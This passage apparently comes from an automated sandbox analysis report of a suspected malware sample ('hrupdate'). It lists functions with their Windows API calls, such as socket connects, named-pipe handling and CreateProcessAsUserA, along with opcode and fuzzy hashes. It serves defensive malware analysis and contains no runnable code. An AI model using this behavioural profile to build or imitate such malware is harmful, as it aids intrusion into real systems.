                                                                • Instruction Fuzzy Hash: C251B971D4024BAAEB10DBE0DD51FEE777CAB04348F04C47AE915AB081EA35B65B8B51
                                                                Function 04FC69E2 Relevance: 7.6, APIs: 5, Instructions: 99timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC6A00
                                                                  • Part of subcall function 04FD3DDD: htonl.WS2_32(?), ref: 04FD3E37
                                                                  • Part of subcall function 04FD3DDD: htonl.WS2_32(?), ref: 04FD3E41
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC6A28
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC6A72
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC6ABA
                                                                • GetCurrentDirectoryA.KERNEL32(00000800,00000000), ref: 04FC6AE2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: LocalTime$htonl$CurrentDirectory_memset
                                                                • String ID:
                                                                • API String ID: 1947157357-0
                                                                • Opcode ID: 2f68faadb9878a6d329df244b81eaae9472fc529b467df0a2fe1953eed8ef3e3
                                                                • Instruction ID: 93b9cfc81567c394862babb0217b33af612b35f01c208e14ce2f6bffb0d91076
                                                                • Opcode Fuzzy Hash: 2f68faadb9878a6d329df244b81eaae9472fc529b467df0a2fe1953eed8ef3e3
                                                                • Instruction Fuzzy Hash: 3D31C772D402096EFB20ABF4DD49BAE77ACEF04714F104475E504EA0C0EE78E6524A90
                                                                Function 04FC9A90 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC9AA0
                                                                • _memset.LIBCMT ref: 04FC9AAC
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9B9E
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9BA9
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BB5
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BC0
                                                                  • Part of subcall function 04FC9B4C: _rand.LIBCMT ref: 04FC9C1E
                                                                • __snprintf.LIBCMT ref: 04FC9B08
                                                                • _memset.LIBCMT ref: 04FC9B26
                                                                • _memset.LIBCMT ref: 04FC9B31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc$__snprintf_rand
                                                                • String ID:
                                                                • API String ID: 4266533377-0
                                                                • Opcode ID: 4c94e9a61e663f5e9117e5686e164518248f025a2dbd72e5963d5139a1354bb7
                                                                • Instruction ID: 41721947f0a9f75d48314b54f55c589737cff40d5949a6dc0c35f72af8f2cbd7
                                                                • Opcode Fuzzy Hash: 4c94e9a61e663f5e9117e5686e164518248f025a2dbd72e5963d5139a1354bb7
                                                                • Instruction Fuzzy Hash: 8421CD72900114BBDF15AE15CD81F9B7B6AEF82708F254084ED006B296D6B1FE22CAE4
                                                                Function 04FC80A3 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessAsUserA.ADVAPI32(B52F6D90,00000000,04FCD106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,04FC819B,?), ref: 04FC80C9
                                                                • GetLastError.KERNEL32(?,?,04FCD106,?), ref: 04FC80D9
                                                                • GetLastError.KERNEL32(?,?,04FCD106,?), ref: 04FC80F3
                                                                  • Part of subcall function 04FC7E95: _memset.LIBCMT ref: 04FC7EC3
                                                                  • Part of subcall function 04FC7E95: _memset.LIBCMT ref: 04FC7EDF
                                                                • CreateProcessA.KERNEL32(00000000,04FCD106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,04FC819B,?,?), ref: 04FC8118
                                                                • GetLastError.KERNEL32(?,?,04FCD106,?), ref: 04FC8122
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateProcess_memset$User
                                                                • String ID:
                                                                • API String ID: 3779600536-0
                                                                • Opcode ID: 5df6ceb2c830d35b9b725822a9dd97e49c89044803d3a417bf124557ffe27b2f
                                                                • Instruction ID: 428eb7fff7277853d9f27f095c324d15d6a31db90630853dbc30a36738ce3a83
                                                                • Opcode Fuzzy Hash: 5df6ceb2c830d35b9b725822a9dd97e49c89044803d3a417bf124557ffe27b2f
                                                                • Instruction Fuzzy Hash: 2F115E32640742BFDB326FA2AD48D277BBEEFC5B96F10481DF58281050DB25A852DB31
                                                                Function 04FCCB9B Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTickshutdown$closesocket
                                                                • String ID:
                                                                • API String ID: 3414035747-0
                                                                • Opcode ID: 8aa895088dce4e0efb4e0c328f532a5c221c3b564b422eab592d5cc5a89b27d7
                                                                • Instruction ID: 80b0521b61f7d173917d2a8ecf9ad366e50d0bdbe279cea21c10f421819ad55d
                                                                • Opcode Fuzzy Hash: 8aa895088dce4e0efb4e0c328f532a5c221c3b564b422eab592d5cc5a89b27d7
                                                                • Instruction Fuzzy Hash: 7C118F32D00B82CFEB319F64EA44A26B3E5FF04710B054A2ED48A93944EB35F802CB51
                                                                Function 030D0840 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 030D086E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943261840.00000000030D0000.00000020.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_30d0000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: 2a134d492770cdc7aa311e60dcd2e1e8c56654894d83c164e59a33a638aa477b
                                                                • Instruction ID: 117aacebc6f41eb907db5de15acc466b301cafd34e1bb35c46d83381d73a49a5
                                                                • Opcode Fuzzy Hash: 2a134d492770cdc7aa311e60dcd2e1e8c56654894d83c164e59a33a638aa477b
                                                                • Instruction Fuzzy Hash: 73215934602345EFCB54DF94C088BA97BE5BF44340F1481A8E98D5F245CB31E882CBD0
                                                                Function 04FCADB3 Relevance: 7.5, APIs: 5, Instructions: 49pipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FD2BBA: _memset.LIBCMT ref: 04FD2C43
                                                                • GetLastError.KERNEL32(74DF23A0,?,?,?,04FCAE7B,?,-0000EA60,?,?,04FC6D15,?,?), ref: 04FCADC3
                                                                • WaitNamedPipeA.KERNEL32(?,00002710), ref: 04FCADD8
                                                                • SetNamedPipeHandleState.KERNEL32(04FC6D15,?,00000000,00000000,?,?,?,04FCAE7B,?,-0000EA60,?,?,04FC6D15,?,?), ref: 04FCAE01
                                                                • DisconnectNamedPipe.KERNEL32(04FC6D15,?,?,?,04FCAE7B,?,-0000EA60,?,?,04FC6D15,?,?), ref: 04FCAE0D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$DisconnectErrorHandleLastStateWait_memset
                                                                • String ID:
                                                                • API String ID: 1374046827-0
                                                                • Opcode ID: 6f25179b95feb7470a0053ab0327d103bcc652b2a5f8ca8a5ecb63a92c3d406c
                                                                • Instruction ID: 315b1d90dfc23f6b78a64237c76c0a31b4eb78bbc307665008530e4be2cfdb7e
                                                                • Opcode Fuzzy Hash: 6f25179b95feb7470a0053ab0327d103bcc652b2a5f8ca8a5ecb63a92c3d406c
                                                                • Instruction Fuzzy Hash: 8F01F272A00009FFEF101F31ED08F2A7BADEF04755B10492CF546D4090FA70BC529A60
                                                                Function 04FE5CDE Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __getptd.LIBCMT ref: 04FE5CEA
                                                                  • Part of subcall function 04FDF61D: __getptd_noexit.LIBCMT ref: 04FDF620
                                                                  • Part of subcall function 04FDF61D: __amsg_exit.LIBCMT ref: 04FDF62D
                                                                • __amsg_exit.LIBCMT ref: 04FE5D0A
                                                                • __lock.LIBCMT ref: 04FE5D1A
                                                                • InterlockedDecrement.KERNEL32(?), ref: 04FE5D37
                                                                • InterlockedIncrement.KERNEL32(4029A377), ref: 04FE5D62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                • String ID:
                                                                • API String ID: 4271482742-0
                                                                • Opcode ID: dd2087101ebf0309aedf18a423cd7bc2b9884b4d00d4dcfea61c6f74983ec76d
                                                                • Instruction ID: 31f8da86117f430dc4a546ffae917cdb231adc4bef9a15bfd14d0954b2064c01
                                                                • Opcode Fuzzy Hash: dd2087101ebf0309aedf18a423cd7bc2b9884b4d00d4dcfea61c6f74983ec76d
                                                                • Instruction Fuzzy Hash: CF016132D05725ABEB31AFA6A80876D7365BF0472AF140145E904A7690CB78F853CBD5
                                                                Function 04FD3E60 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FD3E67
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _malloc.LIBCMT ref: 04FD3E74
                                                                • _malloc.LIBCMT ref: 04FD3E8F
                                                                • __snprintf.LIBCMT ref: 04FD3EA2
                                                                • _malloc.LIBCMT ref: 04FD3EC1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$AllocateHeap__snprintf
                                                                • String ID:
                                                                • API String ID: 3929630252-0
                                                                • Opcode ID: f274a6240caaf04d974b89143aec6c7ff44fdfcc643ef32c5c1b0322811da6c4
                                                                • Instruction ID: 369cf1d252c7a62610d3baa0541e0b78198088520da66f182bf445fbcd943592
                                                                • Opcode Fuzzy Hash: f274a6240caaf04d974b89143aec6c7ff44fdfcc643ef32c5c1b0322811da6c4
                                                                • Instruction Fuzzy Hash: E2016271904304AFE710EF79DC84957BBEDDF46654B04C82AF949D7211D670F9058B91
                                                                Function 04FC6B77 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FC6B84
                                                                • gethostbyname.WS2_32(?), ref: 04FC6B98
                                                                • htons.WS2_32(?), ref: 04FC6BC1
                                                                • connect.WS2_32(00000000,?,00000010), ref: 04FC6BD1
                                                                • closesocket.WS2_32(00000000), ref: 04FC6BDB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: closesocketconnectgethostbynamehtonssocket
                                                                • String ID:
                                                                • API String ID: 530611402-0
                                                                • Opcode ID: 8c3c2bd4798a79f9a0cf09cc9962df59210a1319322d26f080d932f51fe67372
                                                                • Instruction ID: 5632d3c55a6cf15d4c71b4f19580f1178e4e1ce172d182dc574ba0a9abd249fc
                                                                • Opcode Fuzzy Hash: 8c3c2bd4798a79f9a0cf09cc9962df59210a1319322d26f080d932f51fe67372
                                                                • Instruction Fuzzy Hash: F7F0A431A0421976FB107BB58D05FBF77A89F00728F00465AFD21EA1E1E6B0F5028395
                                                                Function 04FDD93E Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FE0075: __mtinitlocknum.LIBCMT ref: 04FE008B
                                                                  • Part of subcall function 04FE0075: __amsg_exit.LIBCMT ref: 04FE0097
                                                                  • Part of subcall function 04FE0075: RtlEnterCriticalSection.NTDLL(?), ref: 04FE009F
                                                                • ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                • ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                • HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                • GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 2714421763-0
                                                                • Opcode ID: 3213c8a0197978f8ffbcec38f1f9de7c7c6c51c280da126e4c912a92bddbd1f7
                                                                • Instruction ID: 4a45178123ba690c71995787658d3d890647eede50da24875f24d90e11e70fd0
                                                                • Opcode Fuzzy Hash: 3213c8a0197978f8ffbcec38f1f9de7c7c6c51c280da126e4c912a92bddbd1f7
                                                                • Instruction Fuzzy Hash: 6F01AD71D01315AFEB30BFB1AC09B6D3A69AF007ADF181009E104A6094DFB9B543CA56
                                                                Function 04FCB6FE Relevance: 7.5, APIs: 5, Instructions: 40sleeppipeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCB70B
                                                                • GetTickCount.KERNEL32 ref: 04FCB712
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 04FCB725
                                                                • Sleep.KERNEL32(0000000A), ref: 04FCB736
                                                                • GetTickCount.KERNEL32 ref: 04FCB73C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$NamedPeekPipeSleep
                                                                • String ID:
                                                                • API String ID: 1593283408-0
                                                                • Opcode ID: e30f0c1bde34a557ba586550b9c1d2ef4fad534541e84981043adf046dfef70e
                                                                • Instruction ID: f3960afdb65a5e92b8c63dce9a36a938034985aeb9310243ec9784c91bb750f0
                                                                • Opcode Fuzzy Hash: e30f0c1bde34a557ba586550b9c1d2ef4fad534541e84981043adf046dfef70e
                                                                • Instruction Fuzzy Hash: 2AF0827665011DBFEB025FA4FD8186E77ADDF44296B14087AF901D2000EA74FD039EB0
                                                                Function 04FC82F3 Relevance: 6.1, APIs: 4, Instructions: 143COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                  • Part of subcall function 04FDE48E: __fsopen.LIBCMT ref: 04FDE49B
                                                                • _fseek.LIBCMT ref: 04FC8369
                                                                  • Part of subcall function 04FDEAC8: __lock_file.LIBCMT ref: 04FDEAD7
                                                                  • Part of subcall function 04FDEAC8: __ftelli64_nolock.LIBCMT ref: 04FDEAE4
                                                                • _fseek.LIBCMT ref: 04FC8382
                                                                  • Part of subcall function 04FDEE59: __lock_file.LIBCMT ref: 04FDEEA4
                                                                  • Part of subcall function 04FDEE59: __fseek_nolock.LIBCMT ref: 04FDEEB4
                                                                • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 04FC83AF
                                                                • _malloc.LIBCMT ref: 04FC83C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                                                                • String ID:
                                                                • API String ID: 73014519-0
                                                                • Opcode ID: b3654dcc4d4fa82be1be93dacdb3a30702cb3e2d9522af8609077a7c484f4950
                                                                • Instruction ID: d5efe5ea612a7fe2a79399712d6ab6a17250419fcbbf01bf08ed2de6dca7c150
                                                                • Opcode Fuzzy Hash: b3654dcc4d4fa82be1be93dacdb3a30702cb3e2d9522af8609077a7c484f4950
                                                                • Instruction Fuzzy Hash: 8441D272D0020AAEEF10BFA4DD81F9FBBB8AF48754F14452DF514B6290EA34B6068B51
                                                                Function 04FC75C1 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ac3827d86c92321b8b7634e4c47ba61d28f67b206b0246a9f92fa354ac449f81
                                                                • Instruction ID: b7331494d363322576dcf3d9b2fc26089cdd111e3d53c48eae87ddfe56d21ced
                                                                • Opcode Fuzzy Hash: ac3827d86c92321b8b7634e4c47ba61d28f67b206b0246a9f92fa354ac449f81
                                                                • Instruction Fuzzy Hash: A2416076C0010AFFEF01FBE5DD419EEBBB9EF44228F14406AE914A2141EB35A6169F91
                                                                Function 04FDE4A5 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __flush.LIBCMT ref: 04FDE569
                                                                • __fileno.LIBCMT ref: 04FDE589
                                                                • __locking.LIBCMT ref: 04FDE590
                                                                • __flsbuf.LIBCMT ref: 04FDE5BB
                                                                  • Part of subcall function 04FDFE0C: __getptd_noexit.LIBCMT ref: 04FDFE0C
                                                                  • Part of subcall function 04FE1DF7: __decode_pointer.LIBCMT ref: 04FE1E02
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                • String ID:
                                                                • API String ID: 3240763771-0
                                                                • Opcode ID: db026ff494a3457978239db1d965547ff14943b162c60d0616ecb1d5d1b74f91
                                                                • Instruction ID: 75984020c6acb92776a37b6039d1dd2775e2d327bc766e386b1732103fcef710
                                                                • Opcode Fuzzy Hash: db026ff494a3457978239db1d965547ff14943b162c60d0616ecb1d5d1b74f91
                                                                • Instruction Fuzzy Hash: ED419331E00A049FDB25DF6989407AEB7B7AF80360F2C8669D415DB140FB70FA52DB50
                                                                Function 04FC4FB0 Relevance: 6.1, APIs: 4, Instructions: 137memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,000002F0,?,00000000,04FC532B,?,00000001,?,00000008,00000001), ref: 04FC5015
                                                                • _memset.LIBCMT ref: 04FC504A
                                                                • HeapFree.KERNEL32(433DB52F,00000000,960B05BF,000002F0,?,00000000,04FC532B,?,00000001,?,00000008,00000001), ref: 04FC50F7
                                                                • HeapDestroy.KERNEL32(?,00000008,00000001), ref: 04FC5103
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Heap$DestroyErrorFreeLast_memset
                                                                • String ID:
                                                                • API String ID: 4224181572-0
                                                                • Opcode ID: 7dd375981c29f23b63eaf24b15697de0b7ea4f87583387c1356c008b9a0c6e89
                                                                • Instruction ID: 2c026372ca3d49663a9aa7cb7560a548d5805585778dfad6b3809d02c83659c6
                                                                • Opcode Fuzzy Hash: 7dd375981c29f23b63eaf24b15697de0b7ea4f87583387c1356c008b9a0c6e89
                                                                • Instruction Fuzzy Hash: 4941E672D00227BFEB306F55AE459AE77A9EB04318F14242EF94197041EB34F983DB95
                                                                Function 04FC8BE2 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memsethtonl
                                                                • String ID:
                                                                • API String ID: 4002686732-0
                                                                • Opcode ID: dfd0d39ead04f13afa3c310dcec116386ef4fc47dc99a3baa511aa946d6a640a
                                                                • Instruction ID: 26e18c71ea33454da317e3262bed994f7cfdc1a5c29c11d2d0fc8f7511c55f23
                                                                • Opcode Fuzzy Hash: dfd0d39ead04f13afa3c310dcec116386ef4fc47dc99a3baa511aa946d6a640a
                                                                • Instruction Fuzzy Hash: 1C411BB1D0031AAFEB10EFA4DD45AAE7F79EF042A6F10442DE409DB151E670E943CB90
                                                                Function 04FC6EEB Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • htonl.WS2_32(?), ref: 04FC6FA0
                                                                • htonl.WS2_32(?), ref: 04FC6FAA
                                                                • _malloc.LIBCMT ref: 04FC6FC1
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _memset.LIBCMT ref: 04FC7025
                                                                  • Part of subcall function 04FCFF96: __snprintf.LIBCMT ref: 04FD0014
                                                                  • Part of subcall function 04FCFF96: __snprintf.LIBCMT ref: 04FD0026
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                                                                • String ID:
                                                                • API String ID: 1734027086-0
                                                                • Opcode ID: 81a454addd3ff2eeba75d35ee0711f8246c588094d0931f850e72e9044d3e62a
                                                                • Instruction ID: 6e945ce6d8c8b43b3c579642d6e5eacd7bbb297bd40cf96b678f5cc63dddfae8
                                                                • Opcode Fuzzy Hash: 81a454addd3ff2eeba75d35ee0711f8246c588094d0931f850e72e9044d3e62a
                                                                • Instruction Fuzzy Hash: E5413931D0828AEDFB11A7F8DC047EFBFB55F56308F184099D440A7282EB795606D3A6
                                                                Function 04FC8F1A Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc
                                                                • String ID:
                                                                • API String ID: 3506388080-0
                                                                • Opcode ID: 88e9c66ec8dd19708875744fecc451fdfef1374b9e4ca2884bc61362f1f8c5f6
                                                                • Instruction ID: 060aef57bb8c86db372b7f5cb1a9d5cf46e26738ca273fb53e6955cfe153ec82
                                                                • Opcode Fuzzy Hash: 88e9c66ec8dd19708875744fecc451fdfef1374b9e4ca2884bc61362f1f8c5f6
                                                                • Instruction Fuzzy Hash: 2C41E731D00606EFEB21EF98C980B5AF7E2EF85356F24881DD955A7145E771F902CB01
                                                                Function 04FCAED6 Relevance: 6.1, APIs: 4, Instructions: 117sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FCAEF6
                                                                • _memset.LIBCMT ref: 04FCAF08
                                                                  • Part of subcall function 04FCC036: htons.WS2_32(?), ref: 04FCC04E
                                                                  • Part of subcall function 04FCAE32: GetLastError.KERNEL32(-0000EA60,?,?,04FC6D15,?,?), ref: 04FCAE4D
                                                                • Sleep.KERNEL32(000001F4), ref: 04FCAFA8
                                                                • GetLastError.KERNEL32 ref: 04FCAFB4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_memset$Sleephtons
                                                                • String ID:
                                                                • API String ID: 2264653377-0
                                                                • Opcode ID: eb0f29d33237045bb0af0508d09b0b4072f70d0141ec0e894f746ee91b88fe55
                                                                • Instruction ID: ea7cb87e16c7f1698583e569aa9035f8a3c2a87cf63b213c7cf3527d2886af22
                                                                • Opcode Fuzzy Hash: eb0f29d33237045bb0af0508d09b0b4072f70d0141ec0e894f746ee91b88fe55
                                                                • Instruction Fuzzy Hash: 1C318777D0421EAEEF15EBE5EE41EEE77BCDF04354F10006AE644A6080EA35BE458B61
                                                                Function 04FD0E17 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __time64.LIBCMT ref: 04FD0E25
                                                                  • Part of subcall function 04FDDC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04FD0BCD,00000000,00000080,00000000,00000000,?,?,?,04FC35CD,?,00000000,00000000), ref: 04FDDC30
                                                                  • Part of subcall function 04FDDC25: __aulldiv.LIBCMT ref: 04FDDC50
                                                                • __time64.LIBCMT ref: 04FD0E40
                                                                • __time64.LIBCMT ref: 04FD0ED3
                                                                • __time64.LIBCMT ref: 04FD0F29
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __time64$Time$FileSystem__aulldiv
                                                                • String ID:
                                                                • API String ID: 4218076520-0
                                                                • Opcode ID: 077bb3c63213a040a2fad6a7614dbe13200177bb4b4506c2aa485f81d7f937aa
                                                                • Instruction ID: edf5e8f9c4599e90ca375cb46e45fc7d0b274986a2333f59e387188a2603d0f8
                                                                • Opcode Fuzzy Hash: 077bb3c63213a040a2fad6a7614dbe13200177bb4b4506c2aa485f81d7f937aa
                                                                • Instruction Fuzzy Hash: ED412A71C50205DFC724CF29E5D296EBBF6FB84308F24996EE42597652EB386642CF00
                                                                Function 04FCA71B Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FCA734
                                                                • GetVersionExA.KERNEL32(?,?,?,04FC9F20), ref: 04FCA74D
                                                                • SetLastError.KERNEL32(00000005,?,?,04FC9F20), ref: 04FCA772
